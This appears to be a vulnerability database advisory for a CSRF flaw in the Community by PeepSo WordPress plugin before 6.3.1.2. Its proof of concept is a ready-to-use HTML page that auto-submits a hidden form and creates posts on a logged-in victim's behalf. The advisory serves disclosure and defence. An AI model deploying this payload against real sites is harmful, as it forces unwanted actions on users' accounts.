WordPress Plugin Vulnerabilities
Community by PeepSo < 6.3.1.2 - User Post Creation via CSRF
Description
The plugin does not have CSRF check when creating a user post (visible on their wall in their profile page), which could allow attackers to make logged in users perform such action via a CSRF attack
Proof of Concept
1. Log in as a normal user. 2. Save the content below as an HTML file. <html> <body> <form action="https://example.com/peepsoajax/postbox.post" method="POST"> <input type="hidden" name="content" value="testing by bikram " /> <input type="hidden" name="id" value="2" /> <input type="hidden" name="uid" value="2" /> <input type="hidden" name="acc" value="10" /> <input type="hidden" name="type" value="activity" /> <input type="hidden" name="mood" value="0" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> 3. Change the ID and UID value to your account ID. 4. Open the above HTML file and submit it. A new post will be created and can be seen in the profile page (default /profile/)
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
Miscellaneous
Original Researcher
Bikram Kharal
Submitter
Bikram Kharal
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-09 (about 4 months ago)
Added
2024-01-09 (about 4 months ago)
Last Updated
2024-01-09 (about 4 months ago)